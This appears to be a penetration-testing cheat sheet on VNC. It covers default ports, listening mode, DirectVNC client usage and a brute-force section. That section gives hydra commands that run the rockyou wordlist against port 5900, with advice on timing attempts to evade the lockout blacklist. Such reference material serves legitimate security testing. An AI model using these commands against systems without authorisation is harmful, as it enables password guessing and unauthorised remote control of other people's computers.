Virtual Network Computing (VNC) is a graphical desktop-sharing system that uses the Remote Frame Buffer protocol (RFB) to remotely control another computer. It transmits the keyboard and mouse input from one computer to another, relaying the graphical-screen updates, over a network.
A viewer connects to a port on the server (default port: 5900) or a browser can connect to the server (default port: 5800). And a server can connect to a viewer in “listening mode” on port 5500. One advantage of listening mode is that the server site does not have to configure its firewall to allow access on port 5900 (or 5800); the duty is on the viewer, which is useful if the server site has no computer expertise and the viewer user is more knowledgeable.
DirectVNC (client / VNC viewer)
Installation
sudo apt install directvnc
Help
directvnc -h
Connection
directvnc $IP
directvnc $IP -p <password of VNC server>
Quit
[Ctrl] + q
Bruteforce
Does not take a username, maximum 4 threads or you will get false negatives.
VNC does not have a login name. In older versions, no password policy could be set (no password complexity) and there was no blacklist feature. Newer versions have a blacklist feature that will block you after 5 failed login attempts. During penetration tests, increase the wait time per try in hydra (-W ) to anything over 60 and if you are attacking an older version of VNC this blacklisting feature is not enabled by default.
- -w 5: This sets the wait time between tries I have gone for 5 here but remember to go a lot higher if the blacklisting feature is still enabled
- -f: Quits once hydra has found a positive Password match.
- -v: Verbose this will display the password it tries in the terminal for each attempt.
IP=x.x.x.x
WL=/usr/share/wordlists/rockyou.txt
hydra -s 5900 -P $WL -t 4 $IP vnc
hydra -w 5 -f -v -s 5900 -P $WL -t 4 $IP vnc